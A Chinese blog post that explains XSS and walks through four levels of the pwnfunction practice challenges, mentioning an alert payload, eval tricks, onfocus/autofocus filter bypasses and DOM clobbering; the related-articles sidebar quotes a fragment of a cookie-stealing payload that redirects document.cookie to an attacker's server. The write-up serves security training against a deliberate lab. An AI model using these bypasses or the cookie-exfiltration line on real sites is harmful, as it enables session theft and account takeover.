XSS简单介绍

最新推荐文章于 2024-06-25 10:08:51 发布
最新推荐文章于 2024-06-25 10:08:51 发布
阅读量327 收藏
点赞数
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53434577/article/details/132650624
版权

目录

一、认识XSS

1.XSS原理

2.XSS分类

二、XSS漏洞复现

1.搭建靶机进行复现

2.案例解析

2.1第一关

2.2第二关

2.3第三关

2.4第四关

一、认识XSS

1.XSS原理

XSS跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

2.XSS分类

按大类划分为俩类:反射型XSS和存储型XSS。

细分的话反射型XSS又可以分为普通型和DOM型。

二、XSS漏洞复现

1.搭建靶机进行复现

https://xss.pwnfunction.com/

直接复制地址到浏览器进行练习。出现以下页面表示成功。

以下为部分漏洞复现详解。

2.案例解析

2.1第一关

 解析:主要关注innerHTML。

输入<script>alert(1337)</script>无法运行,这是由于禁用,在innerHtml中不能执行<script>。

虽然加入了,但并没有进行弹窗。

第一种:

第二种:

2.2第二关

 解析:关注eval,可以通过连接符进行。但是在url中输入时需要进行将连接符进行编码才可以。

2.3第三关

解析:过滤了<>, 进行测试。

注:虽然弹窗了,但是与客户交互后进行的,违背了题目要求。

如何实现? 使用onfocus取代用户,不用用户进行交互。

onfocus:onfocus 事件在对象获得焦点时发生。

autofocus :当设置该属性后,它规定在页面加载后文本区域自动获得焦点。

2.4第四关

注:这题将所有的方法都过滤掉,引出一个新知识点,dom破坏。

 

《^O^》杜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
XSS 漏洞简单介绍
2401_84275261的博客
04-15 1216
XSS(跨站脚本攻击,Cross-Site Scripting)是一种常见的Web安全漏洞,它允许攻击者在网页上注入恶意脚本代码。最早被发现的XSS漏洞是在1996年,随着JavaScript的出现,XSS漏洞因为可以使用JavaScript进行攻击而变得更加普遍和危险。2、控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力。8、窃取 cookie 的 sessionid,冒充登录。1、盗取各类用户账号,如机器登录帐号、用户网银帐号、各类管理员帐号。3、盗窃企业重要的具有商业价值的资料。
XSS简单了解
j1044957016的博客
05-30 1050
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、XSS的基本了解二、XSS的漏洞危害三、XSS易出现场景四、XSS漏洞分类1.反射型XSS总结 前言 写这玩意儿感觉回到了大学写课设作业 一、XSS的基本了解 XSS 被称为跨站脚本攻击由于和CSS 重名,所以改为XSSXSS主要使用javascript,javascript 可以非常灵活的操作html、css和浏览器。 XSS 就是将恶意代码注入到网页中,以达到攻击的效果。 当用户访问被XSS 注入的网页,XSS.
XSS简述
qq_62098017的博客
09-20 2129
绕过推荐 XSS绕过可以看看该文章:XSS过滤绕过速查表 0.介绍 跨站攻击,即Cross Site Script Execution(通常简写为XSS),是前端的漏洞,产生在浏览器一端的漏洞。它是指攻击者在网页中嵌入客户端脚本,主要利用js编写的恶意代码来执行一些想要的功能,也就是说它能干嘛是受到js的控制,那么js能执行出什么脚本代码就取决于它能干嘛。当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行。 0.1.能干嘛 常规用到的是盗取cookie、js做钓鱼攻击、流
使用Django简单编写一个XSS平台的方法步骤
09-19
主要介绍了使用Django简单编写一个XSS平台的方法步骤,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
第二节 XSS fuzzing 工具-01
09-15
XSS Fuzzing 工具 - XSStrike 工具介绍 XSStrike 是一款检测 Cross Site Scripting (XSS) 的高级检测工具,集成了 payload 生成器、爬虫和模糊引擎功能。该工具不是简单地注入有效负载并检查其工作,而是通过多个...
xss-labs挑战(一) 1
08-08
本文将详细介绍 XSS-labs 挑战(一)1 的知识点,包括挑战的安装、Level 1 无过滤机制、Level 2 闭合标签、Level 3 单引号闭合+htmlspecialchar()函数、Level 4 双引号闭合+添加事件、Level 5 javascript 伪协议等。...
第四节 隐藏提交参数中的XSS-01
09-15
例如:(document.domain)>%0a,这是一个简单XSS攻击示例。闭合触发XSS可以使攻击者在用户的浏览器中执行恶意脚本,导致安全问题。 总结 ---- 本节课程主要讲解了隐藏提交参数中的XSS攻击,包括HTML表单隐藏参数...
xss漏洞之进制转换
02-27
SQL注入的事件已经是上个世纪最令人头疼的攻击方法,21世纪又出现了HTML注入漏洞,随着web飞速的发展,XSS漏洞已经不容忽视,简单介绍一下XSS漏洞, 只要有用户输入的地方,就会出现XSS漏洞,例如在发表一篇帖子的...
XSS 安全漏洞介绍及修复方案
最新发布
墨鸦的博客
06-25 1354
XSS 安全漏洞介绍及修复方案
Web渗透:XSS-DOM-based XSS
WolvenSec的博客
06-21 999
DOM-based XSS(基于DOM的跨站脚本攻击)是一种XSS攻击类型,其特点是恶意脚本通过操作文档对象模型(DOM)直接在客户端执行,而无需经过服务器的处理。这种攻击主要利用客户端JavaScript代码中的漏洞,使得攻击者能够在浏览器中注入并执行恶意代码。
XSS漏洞—XSS平台搭建与打cookie
goldfish8848的博客
06-21 1470
6. **避免内联事件**:避免在HTML中使用内联JavaScript事件处理器,如 `onLoad="onload('{{data}}')"` 或 `onClick="go('{{action}}')"`,因为这些容易受到XSS攻击。7. **避免拼接HTML**:前端采用拼接HTML的方法比较危险,如果可能,使用 `createElement`、`setAttribute` 等方法实现,或者采用成熟的渲染框架,如Vue或React。攻击者可能会尝试使用不同的字符编码或分隔符来绕过简单的输入验证。
XSS跨站脚本攻击对网站有哪些危害
weixin_68778384的博客
06-19 559
XSS跨站脚本攻击是一种典型的Web程序漏洞利用攻击。攻击者利用Web程序对用户输入检查不足的漏洞,将可执行恶意脚本注入网站或Web应用。当用户访问这些被注入恶意脚本的网页时,恶意脚本会在用户的浏览器中执行,从而达到窃取用户个人数据、弹出广告、篡改网页内容等攻击目的。为了防范XSS跨站脚本攻击,网站开发者需要采取一系列的安全措施,如对用户输入进行严格的验证和过滤、设置安全的HTTP响应头部、使用安全的编码实践等。同时,定期更新和打补丁也是防止新发现的安全漏洞被利用的重要手段。
网络安全:Web 安全 面试题.(XSS
网络安全领域___专研者.
06-20 1145
网络安全面试是指在招聘过程中,面试官会针对应聘者的网络安全相关知识和技能进行评估和考察。这种面试通常包括以下几个方面: (1)基础知识:包括网络基础知识、操作系统知识、密码学知识等。 (2)安全技术:如入侵检测、防火墙配置、密码管理、漏洞分析等技术的掌握程度。 (3)安全实践:评估应聘者在实际工作中解决网络安全问题的能力,如案例分析、渗透测试等。 (4)安全意识:了解应聘者对网络安全的重视程度和责任心,以及在安全事故发生时的应对能力。 (5)项目经验:询问应聘者参与过的网络安全相关项目,了解其在项目中的具体
csrf+xss组合拳
m0_68976043的博客
06-19 484
靶场cms文章管理系统。
xss一些笔记
banliyaoguai的博客
06-19 318
服务端会将你的文件名返回给你的客户端,保存在你客户端的cookie,当你二次登陆时浏览器会带着你的cookie进入到服务端,服务器就会在自己的文件中找有没有你cookie名字的文件。xss payload 构造<script>doument.location.href=“自己服务器地址/cookie.php?document.location.hash.slice(1)//获取#号后的部分,不包括#号。document.location.hash // #号后的部分,包括#号。
XSS+CSRF组合拳
banliyaoguai的博客
06-20 531
(案例中将使用cms靶场来进行演示)在实战中CSRF利用条件十分苛刻,因为我们需要让受害者点击我们的恶意请求不是一件容易的事情。所以单单一个CSRF漏洞危害是很小的,所以我们为了扩大危害,就需要借助XSS漏洞与之配合。我们利用XSS漏洞让受害者执行JS代码,JS代码有发起请求的功能,借此功能我们配合CSRF漏洞达成我们的攻击。我们利用XSS执行JS代码的时候发起我们构造的恶意请求,从而能达到让受害者无感知地受到攻击。如何通过js发起请求,具体来说有以下步骤创建实例发出 HTTP 请求。
日常工作记录目录
与海
06-21 246
EasyExcel实现二维码下载与展示
【尚庭公寓SpringBoot + Vue 项目实战】后台用户信息管理(十七)
小林的博客
06-18 994
用户的密码通常不会直接以明文的形式保存到数据库中,而是会先经过处理,然后将处理之后得到的"密文"保存到数据库,这样能够降低数据库泄漏导致的用户账号安全问题。
构造一个反射型xss漏洞
06-03
为了保护网络安全,我不能提供具体的反射型XSS漏洞构造方法,但是我可以简单介绍XSS漏洞的原理和实现方式: XSS攻击可以通过在网页中注入恶意脚本来实现,这些脚本可以通过各种方式进行注入,例如在URL参数、表单、cookie等地方注入。攻击者利用这些漏洞可以窃取用户的cookie、密码等敏感信息,或者进行其他的恶意操作。 为了防止XSS攻击,我们需要在开发和运维中加强对输入输出数据的过滤和验证,对于不合法的数据进行拒绝处理,对输出的数据进行编码,避免恶意脚本的注入。同时,需要使用HTTPOnly属性,禁止恶意脚本窃取用户的cookie,使用CSP(Content Security Policy)策略,限制网页中可执行的JavaScript代码,避免恶意脚本的注入。 总之,XSS漏洞是一种常见的网络安全漏洞,我们应该加强对XSS漏洞的防范,保护用户的信息安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值